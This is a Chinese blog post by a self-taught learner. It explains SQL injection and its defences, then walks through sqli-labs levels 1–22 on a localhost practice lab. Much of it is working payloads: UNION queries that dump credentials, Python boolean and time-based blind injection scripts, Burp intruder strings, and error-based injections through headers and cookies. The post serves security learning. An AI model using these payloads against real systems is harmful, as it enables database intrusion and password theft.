OWASP-TOP10漏洞-注入漏洞

最新推荐文章于 2024-05-09 11:59:57 发布
最新推荐文章于 2024-05-09 11:59:57 发布
阅读量1.1k 收藏 8
点赞数 1
分类专栏: OWASP TOP10 文章标签: 安全 web安全 网络安全 学习 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44770698/article/details/126708689
版权

😋大家好,我是YAy_17,是一枚爱好网安的小白,正在自学ing。

本人水平有限,欢迎各位大佬指点,一起学习💗,一起进步⭐️

⭐️此后如竟没有炬火,我便是唯一的光。⭐️

目录

注入漏洞的原理

注入攻击的危害

SQL注入的防御

关于注入攻击的练习

Level-1

Level-2

Level-3

Level-4

Level-5

Level-6 

Level-7

Level-8

Level-9

Level-10 

Level-11

Level-12

Level-13

Level-14

Level-15

Level-16

Level-17

Level-18

Level-19

Level-20

Level-21

Level-22

经过三个月的学习,完成了小迪老师的课程,学完之后感觉自己刚开始入门网安,了解了很多的网安知识,但还没有深入的理解与运用,接下来自己的计划便是慢慢深入学习TOP10漏洞。今天开始学习注入漏洞。

注入漏洞的原理

注入攻击是指攻击者讲恶意代码注入到应用程序,从而迫使其执行命令妥协数据或者整个应用程序。最常见的注入攻击类型包括SQL注入和跨站点(XSS)脚本攻击,同样还包括着代码注入,命令注入等。

SQL注入是指利用由于用户输入中缺少元字符屏蔽或者验证而导致的SQL数据库漏洞。

注入攻击的危害

攻击者试图通过有权访问数据库的应用程序注入他自己的数据库命令。但是,由于请求未正确验证,插入的代码更改了原始 SQL 命令,因此更改了有利于攻击者的结果。 

攻击成功后,攻击者可以窥探、修改或完全删除数据,并控制服务器。为此,攻击者有不同的方法来破坏系统。例如,可以通过响应时间或错误消息找到进入系统的途径。

SQL注入的防御

避免注入缺陷的主要方法是将数据库中的数据与命令和查询分开,即将其与 Web 应用程序逻辑分开。这可以通过几种不同的方式实现,包括:

  • 使用无需使用解释器或使用参数化查询的安全 API 
  • 引入积极的服务器端输入验证(白名单)
  • 如果应用程序中需要特殊字符,则应尽可能通过特定解释器的转义语法避免使用这些字符
  • 在查询中使用数据库控件,例如 LIMIT SQL 子句,以最大限度地减少注入成功时暴露的数据量

OWASP TOP 10 – 终极漏洞指南(2021)_琦彦的博客-CSDN博客_owasp top10

关于注入攻击的练习

这里我再次把sqllibs的所有关卡做了一遍;

Level-1

首先就是来判断是数字型注入还是字符型的注入,这里用到的方法是使用1' order by 9999#来判断,具体原因为如果是字符型的注入,9999列是不存在的,那么回显一定是出错的!然而如果是数字型的注入,那么同样会直接将 1' order by 9999#代入查询语句,而直接取前面的值1,回显的结果是正确的!

leve1是字符型注入

payload:

?id=-1' union select 1,(select group_concat(username,0x3a,password) from users),3--+

Level-2

数字型注入

判断回显点:
?id=-1 union select 1,2,3--+

爆数据库名:
?id=-1 union select 1,database(),3--+

爆表名
?id=-1 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3--+

爆列名
?id=-1 union select 1,(select group_concat(column_name) from information_schema.columns where table_name='users'),3--+

爆数据

?id=-1 union select 1,(select group_concat(username,0x3a,password) from users),3--+

Level-3

第三关需要通过在单引号后面加上)来闭合前面的右括号。还是字符型注入。

payload

?id=-1') union select 1,(select group_concat(username,0x3a,password) from users),3--+

Level-4

同level-3,变成了双引号先闭合之后再加上)来闭合。

payload:

?id=-1") union select 1,(select group_concat(username,0x3a,password) from users),3--+

Level-5

进来之后提示You are in ....;看来是需要盲注了,还是先判断是数字型的注入还是字符型的注入。 判断出是字符型的注入。

大佬们写的脚本都是用到了二分法,我还是有点不太理解,自己只能写傻瓜脚本。

import requests

url = "http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and 1="

def get_password():
    password = ''
    for i in range(1,150):
        for j in range(32,127):
            #payload = f' if((ascii(substr(database(),{i},1)))={j},1,0)--+'
            #payload = f" if((ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),{i},1)))={j},1,0)--+"
            #payload = f" if((ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='users'),{i},1)))={j},1,0)--+"   
            payload = f" if((ascii(substr((select group_concat(username,0x3a,password) from users),{i},1)))={j},1,0)--+"       
            result = requests.get(url+payload)
            if 'You are in' in result.text:
                password+=chr(j)
                print(password)
                break


if __name__ =='__main__':
   
    get_password()

Level-6 

第六关双引号闭合之后,利用盲注脚本即可。

import requests

url = 'http://127.0.0.1/sqli-labs-master/Less-6/?id=1" and '
database_name=''
for i in range(1,20): 
    for j in range(32,127):
        payload = f'if(ascii(substr(database(),{i},1))={j},1,0)--+'
        #payload = f"if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),{i},1))={j},1,0)--+"
        #payload = f"if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='users'),{i},1))={j},1,0)--+"
        #payload = f"if(ascii(substr((select group_concat(username,0x3a,password) from users),{i},1))={j},1,0)--+"
        final_payload = url+payload
        result = requests.get(final_payload)
        if 'You are in' in result.text:
            database_name+=chr(j)
            print(database_name)

Level-7

level-7 通过单引号+))进行闭合 盲注

import requests

url = "http://127.0.0.1/sqli-labs-master/Less-7/?id=1')) and 1="


def get_database_name():
    print('----------------------------Get_Database_Name-----------------------------')
    database_name = ''
    for i in range(1,20):
        for j in range(32,127):
            payload = f'if(ascii(substr(database(),{i},1))={j},1,0)--+'
            final_payload = url+payload
            result = requests.get(final_payload)
            if 'You are in' in result.text:
                database_name+=chr(j)
                print(database_name)
                break

    return database_name
        

if __name__ =='__main__':
    db_name = get_database_name()

Level-8

基于单引号闭合的布尔盲注。(脚本都写的不全,但是都是差不多的,就没有附上)

'''level8  基于单引号的布尔盲注'''

import requests

url = "http://127.0.0.1/sqli-labs-master/Less-8/?id=1' "
#爆破数据库名

def db_name(url):
    database_name = ''
    for i in range(1,20):
        for j in range(32,127):
            payload = f'and 1=if(ascii(substr(database(),{i},1))={j},1,0)--+'
            final_payload = url+payload
            result = requests.get(final_payload)
            if 'You are in' in result.text:
                database_name+=chr(j)
                print(database_name)
                break

if __name__ == '__main__':
    db_name(url)

Level-9

基于单引号闭合的时间盲注;

'''基于单引号的时间盲注'''

import time
import requests

url = "http://127.0.0.1/sqli-labs-master/Less-9/?id=1' "


def db_name():
    database = ''
    for i in range(1,10):
        for j in range(32,127):
            payload = f'and 1=if(ascii(substr(database(),{i},1))={j},sleep(3),0)--+'
            final_payload = url+payload
            timestart = time.time()
            result = requests.get(final_payload)
            timeend = time.time()
            if timeend-timestart>=3:
                database+=chr(j)
                print(database)
                break

def table_name():
    tab_name = ''
    for i in range(1,40):
        for j in range(32,127):
            payload = f"and 1=if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema ='security'),{i},1))={j},sleep(3),0)--+"
            final_payload = url+payload
            time_start = time.time()
            result = requests.get(final_payload)
            time_end = time.time()
            if time_end - time_start>=3:
                tab_name+=chr(j)
                print(tab_name)
                break
def column_name():
    col_name = ''
    for i in range(1,80):
        for j in range(32,127):
            payload = f"and 1=if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name ='users'),{i},1))={j},sleep(3),0)--+"
            final_payload = url+payload
            time_start = time.time()
            result = requests.get(final_payload)
            time_end = time.time()
            if time_end - time_start>=3:
                col_name+=chr(j)
                print(col_name)
                break

def column_name():
    col_name = ''
    for i in range(1,80):
        for j in range(32,127):
            payload = f"and 1=if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name ='users'),{i},1))={j},sleep(3),0)--+"
            final_payload = url+payload
            time_start = time.time()
            result = requests.get(final_payload)
            time_end = time.time()
            if time_end - time_start>=3:
                col_name+=chr(j)
                print(col_name)
                break
def final_data():
    final_dt = ''
    for i in range(1,80):
        for j in range(32,127):
            payload = f"and 1=if(ascii(substr((select group_concat(username,0x3a,password) from users),{i},1))={j},sleep(3),0)--+"
            final_payload = url+payload
            time_start = time.time()
            result = requests.get(final_payload)
            time_end = time.time()
            if time_end - time_start>=3:
                final_dt+=chr(j)
                print(final_dt)
                break

if __name__ =='__main__':
    #table_name()
    #column_name()
    final_data()

Level-10 

基于双引号闭合的时间盲注;

Level-11

POST请求,单引号闭合的注入。

  

Level-12

基于POST请求的双引号闭合+右括号闭合。

payload:

uname=-admin") union select (select group_concat(username,0x3a,password) from users),2--+&passwd=&submit=Submit

Level-13

基于单引号和右括号的闭合,无回显;当我们登录成功的时候仅仅回显登陆成功;

利用brupsuite的爆破模块进行爆破。

先爆破数据库的长度。payload:

uname=admin') and 1=if(length(database())=8,1,0)--+&passwd=admin&submit=Submit

之后便是通过brup继续爆破数据库各个字符的值。

在之后就是去爆破表名。

uname=admin') and 1=if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),§1§,1))=§1§,1,0)--+&passwd=&submit=Submit

接下来就是去爆破列名和username以及password等信息。

Level-14

基于双引号的闭合;同样还是无回显,只回显我们登录是否成功。操作同上一关,依然是使用brup。

爆破数据库名: 之后便是去爆破表名、列名、以及最终的数据。爆破方法如13关卡 

Level-15

基于单引号闭合的布尔盲注,POST方式提交请求;

回显不一样;order by 3--+回显faiiled...

借助brupsuite的intrude模块进行爆破;

首先爆破数据库名的长度,payload:admin' and length(database())=8--+ 

之后便是常规爆破数据库名,表名和列名,以及最终的账号和密码操作;

#爆破数据库名
uname=admin' and if(ascii(substr(database(),§1§,1))=§115§,1,0)--+

#爆破表名
uname=admin' and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),§1§,1))=§115§,1,0)--+

#爆破列名
uname=admin' and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='users'),§1§,1))=§115§,1,0)--+

#爆破账号和密码
uname=admin' and if(ascii(substr((select group_concat(username,0x3a,password) from users),§1§,1))=§115§,1,0)--+

上图是把爆破列名的部分结果,下图为爆破账号密码的部分结果:

Level-16

基于双引号+右括号的闭合;布尔盲注或者是时间盲注;POST请求;

正常回显;将payload修改为admin") and 1=2--+之后回显不正常,之后便可以通过brupsuite进行爆破。

利用15关的payload继续打;

#爆破数据库的长度
uname=admin") and length(database())=§8§--+

#爆破数据库名
uname=admin") and if(ascii(substr(database(),§1§,1))=§115§,1,0)--+

#爆破表名
uname=admin") and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),§1§,1))=§115§,1,0)--+

#爆破列名
uname=admin") and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='users'),§1§,1))=§115§,1,0)--+

#爆破账号和密码
uname=admin") and if(ascii(substr((select group_concat(username,0x3a,password) from users),§1§,1))=§115§,1,0)--+

Level-17

基于密码的单引号闭合的报错注入;

那就利用报错的函数:updatexml()以及extractvalue()函数。

爆破数据库名: 

#爆破表名
12345' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)--+

#爆破列名
12345' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1)--+

12345' and updatexml(1,substring(concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),30),1)--+

#爆破账号和密码
12345' and updatexml(1,concat(0x7e,(select group_concat(username,0x3a,password) from users),0x7e),1)--+

这里在查询最终的账号和密码的时候出现错误;

意思是:不能在同一个sql语句中,先select同一个表的某些值,然后再update这个表;
解决方法:select的结果再通过一个中间表select多一次,就可以避免这个错误

那么最终的查询账号密码的语句修改为:

123' and (updatexml(1,concat(0x7e,(select password from (select password from users limit 0,1) as b),0x7e),1))#

Level-18

调试代码,将插入的语句输出一下,在进行闭合;

需要再使用and '来闭合后面的语句,实现报错。该题是基于UA头的报错注入;

UA头修改为' and updatexml(1,concat(0x7e,database(),0x7e),1) and '

还可以直接1',2,3)#的方式去注释后面的语句;

之后还是使用报错注入实现注入表名、列名、以及最终的账号和密码; 

#爆破表名
1',updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1),3)#

#爆破列名
1',updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1),3)#

#爆破账号和密码
1',updatexml(1,concat(0x7e,(select group_concat(username,0x3a,password) from users),0x7e),1),3)#

Level-19

基于单引号闭合的Referer头的注入;通过报错函数来完成;

还是像上面的题一样玩;

#爆破表名
1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1) and ' 

#爆破列名
1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1) and ' 

#爆破密码
1' and updatexml(1,concat(0x7e,(select group_concat(username,0x3a,password) from users),0x7e),1) and '

Level-20

通过抓包;查看Cookie中的字段值;发现是从uname中获取的账号;

使用单引号进行闭合,and 1=1--+ 回显正常,and 1=2--+ 回显不正常;

 

payload:
Cookie: uname=admin' order by 3--+    回显正常
Cookie: uname=admin' order by 4--+    回显不正常

Cookie: uname=-admin' union select 1,(select group_concat(username,0x3a,password) from users),3--+

Level-21

该关卡和20关很类似,在Cookie中发现如下:

其中的%3D是经过url编码的“ = ”号;很明显了这串字符是经过了base64编码后的结果;看来我们的注入代码也是要经过base64编码的;

这里尝试单引号去闭合,然后使用and来判断;出错了,发现还有一个括号没有闭合;

payload:
#判断列数
admin') order by 3#    (payload要经过base64编码) 正常回显
admin') order by 4#    (payload要经过base64编码) 不正常回显

#判断回显点
-admin') union select 1,2,3#

#注入账号和密码
-admin') union select 1,(select group_concat(username,0x3a,password) from users),3#

Level-22

该关卡和上一关类似,同样还是通过Cookie来注入,还是base64编码;我们来尝试闭合;

使用双引号闭合的时候发现回显正常的!没有括号;

改为2的时候,不正常的回显;这里就判断该题是仅仅通过双引号闭合,整个payload需要经过base64编码;接下来的步骤如上题相同; 

Y4y17
关注
  • 1
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
OWASP TOP 10漏洞是指哪些
dexunyun的博客
04-12 1558
注入漏洞是一种常见的攻击手段,攻击者通过向应用程序中输入恶意代码,使其执行未经授权的操作。原理: 不安全的反序列化漏洞是指应用程序在反序列化数据时,未能正确验证数据的完整性和有效性,导致攻击者可以利用这个漏洞,执行未授权的代码。原理:应用程序或其环境未正确配置,包括不安全的默认配置、未更新的软件版本、敏感文件暴露等配置问题,导致攻击者可以访问敏感信息、执行未经授权的操作等。攻击者会寻找应用程序中使用的第三方组件中存在的已知漏洞,如SQL注入、跨站脚本攻击等,并利用这些漏洞来攻击应用程序。
注入漏洞详解
工程师学徒AYG
12-01 2579
注入漏洞 注入漏洞 1 SQL注入 所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行指定的SQL语句。具体来说,它是利用现有应用程序,将SQL语句注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入SQL语句得到一个存在安全漏洞的网站上的数据,而不是按照设计者意图去执行SQL语句。 1.1 SQL注入的概念 (1)SQL注入漏洞原理 SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这...
owasp top10 十大常见漏洞详解
最新发布
韩束一叶子
05-09 994
在信息安全中渗透测试方向,OWASP TOP 10 是渗透测试人员必须要深入了解和学习的,今天我们来深入了解和学习下 OWASP 发布的以往最重要的两个版本,研究下我们 IT 行业从业人员最容易引入的漏洞,后续文章会更新具体的漏洞原因、场景、防护手段,提升我们的应用抗风险能力。应用程序安全风险攻击者可以通过应用程序中许多的不同的路径方式去危害企业业务。每种路径方法都代表了一种风险,这些风险都值得关注。什么是 OWASP TOP 10。
注入漏洞一把嗦(原理+步骤+防御)
Y22Lee的博客
03-21 1245
以csdn为例,除去请求头信息,剩下的都是Head信息,其中U-A是用户的基本信息,Referer是用户的请求来源。没有回显的注入,SQL注入中最繁琐;因为没有明确的回显,所以不能直观的得到数据。只能尝试测出数据。一般盲注分为布尔盲注和时间盲注。宽字节是指占俩个以上字节的字符,而一般的字符只占一个字节,被称作单字节(窄字节)。ASCII:单字节编码GBK,UTF-8:单字节/双字节编码(区别根据范围划分,范围与ASCII保持一致)英文通常是默认占用一个字节,而汉字占用俩个字节!
常见安全漏洞及其解决方案
A_991128a的博客
06-17 6200
执行时,此后的文本将被忽略。但这并不是无代价的,受到损失最大的就是被控制的网站,往往随着暗链所指向的网站的权重不断提高,存在暗链的网站的权重将不断下降,搜索引擎排名也必然一再下降,严重影响网站的影响力。漏洞危害:该漏洞是通过版本号探测的,可能存在误报Apache HTTP Server是一款开源的流行的HTTPD服务程序.当处理包含大量Ranges头的HTTP请求时,ByteRange过滤器存在一个错误,攻击者可以向服务器发送特制HTTP请求,消耗大量内存,造成应用程序崩溃CVE-2011-3192。
2022 全球网络黑客常用攻击方法 Top10
Button12138的博客
12-31 2093
当下网络黑产产业链可分为上中下三个层级
OWASP TOP 10漏洞原理和应对策略
qq_44005305的博客
10-14 214
如果你对网络安全入门感兴趣,那么你需要的话可以点击这里👉网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!
Owasp Top10 漏洞笔记
08-27
安全漏洞是 Web 应用程序中的一个常见问题,OWASP Top 10 是一个列表,列出了 Web 应用程序中十大最常见的安全漏洞,其中包括 SQL 注入漏洞、跨站脚本攻击、跨站请求伪造、敏感数据 exposures 等。今天,我们将详细...
owasp top10漏洞讲解
07-22
web渗透之逻辑漏洞,1. 注入 2. 失效的身份认证和会话管理 3. 跨站攻击 4. 不安全的对象直接引用 5. 伪造跨站请求 6. 安全配置错误 7. 限制URL访问失败 8. 未验证的重定向和转发 9. 应用已知脆弱性的组件 10. 敏感...
DVWA靶场,集成了owasp top 10漏洞
03-28
这个靶场集成了OWASP(Open Web Application Security Project)的Top 10漏洞,这些是网络应用中最常见且最具危害性的安全问题。通过在DVWA中实践,用户能够深入理解漏洞的原理,学习如何识别它们,以及如何利用这些...
security-demo:OWASP TOP10&ESAPI 演示
07-12
在"security-demo-master"这个压缩包中,可能包含了用Java实现的OWASP TOP10安全问题的示例代码,以及如何使用ESAPI库来修复这些漏洞的教程。通过分析和学习这些示例,开发者能够更好地理解安全编程的原则和最佳实践...
Web安全之注入漏洞详解及预防
路多辛的所思所想
01-31 862
注入类攻击是 Web 安全领域中最常见的攻击方式,注入攻击发生在当不可信的数据作为命令或者查询语句的一部分被发送给解释器的时候。预防注入类攻击的最好方法是代码审核,可以将静态的(SAST)、动态的(DAST)和交互式(IAST)的安全测试工具集成到 CI/CD 流程中,以便在部署到生产环境之前检测出并解决掉注入类安全问题。注意避免xml注入、代码注入、SQL注入、HTML注入注入型安全问题的发生,一定要在数据拼接的地方进行安全检查,对拼接内容进行严格校验和必要的转义处理。常见的注入漏洞及预防措施。
Web安全之OWASP TOP10漏洞
m0_64481831的博客
03-09 1195
简单点说,OWASP概括了“10项最严重的Web应用程序安全风险列表”,总结了Web应用程序最可能、最常见、最危险的十大漏洞,是开发、测试、服务、咨询人员应知应会的知识。OWASP每四年发布一次,现在最新的OWASP是由2021年公布的。
OWASP TOP 10 漏洞指南(2021)
一期一会的博客
02-11 8628
什么是OWASP TOP 10? OWASP,全称“开放式Web应用程序安全项目”是一个非营利性的组织,2003年该组织首次出版了“Top 10”,也就是10项最严重的Web应用程序安全风险列表。 Top 10 总结了Web应用程序最可能、最常见、最危险的十大安全漏洞。 近几年OWASP TOP的变化 A1 失效的访问控制 概述 失效的访问控制,也叫越权,攻击者通过各种手段提升自己的权限,越过访问控制,使访问控制失效,这样攻击者就可以冒充用户、管理员或拥有特权的用户,或者创建、访问、更新或删除任何记录。
命令注入漏洞原因以及危害
居上
10-25 4794
命令注入-笔记命令注入(OS)原因漏洞危害相关函数和语言结构漏洞利用防御方法| 和 ||,& 和 && 的区别 命令注入(OS) 原因 当应用需要调用一些外部程序时会用到一些系统命令的函数。应用在调用这些函数执行系统命令的时候,如果将用户的输入作为系统命令的参数拼接到命令行中,在没有过滤用户的输入情况下,会造成命令执行漏洞漏洞危害 1、继承Web 服务器程序权限,去执行系统命令 2、继承Web 服务器权限,读取文件 3、反弹Shell 4、控制整个网站 5、控制整个服务器
OWASP top10 漏洞
qq_52469895的博客
04-20 1万+
1.sql注入 原理: SQL 注入就是指 web 应用程序对用户输入的数据合法性没有过滤或者是判断,前端传入的参数是攻击者可以控制,并且参数带入数据库的查询,攻击者可以通过构造恶意的 sql 语句来实现对数据库的任意操作。分类: 1、报错注入 2、bool 型注入 3、延时注入 4、宽字节注入防御: 1.使用预编译语句,绑定变量 2.使用存储过程 3.使用安全函数 4.检查数据类型 ​1.获取数据库名 select SCHEMA_NAME from information_schema.SCHEMA.
OWASP_top_10漏洞的总结笔记
热门推荐
Mi1k7ea
04-11 2万+
这里简单地写一些关于OWASP top 10 漏洞的一些利用技巧以及检测方法、防御方法等的笔记(很多是参考了《Web漏洞讲解》),有新的理解和学会好的方法之后会更新~ 同时也希望各位大牛给给建议~ SQL Injection&Blind SQL Injection(SQL注入与SQL盲注漏洞): 一、绕过WAF的方法: 1. 大小写绕过 2. 简单编码绕过 3. 注释绕过: ...
2021owasp top10漏洞原理
06-06
### 回答1: OWASP Top 10是一个由全球网络安全专家组成的开放性社区,制定了一个关于十种最常见的Web应用程序安全漏洞的清单。这些漏洞包括:注入、认证和授权、敏感数据泄露、XML外部实体(XXE)攻击、缺乏安全配置、跨站点脚本(XSS)攻击、安全漏洞、跨站点请求伪造(CSRF)、使用已知的脆弱性的组件和不足的日志记录和监控。了解OWASP Top 10漏洞的原理非常重要,因为它可以帮助企业识别和弥补其应用程序的漏洞,从而提高其安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Y4y17

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值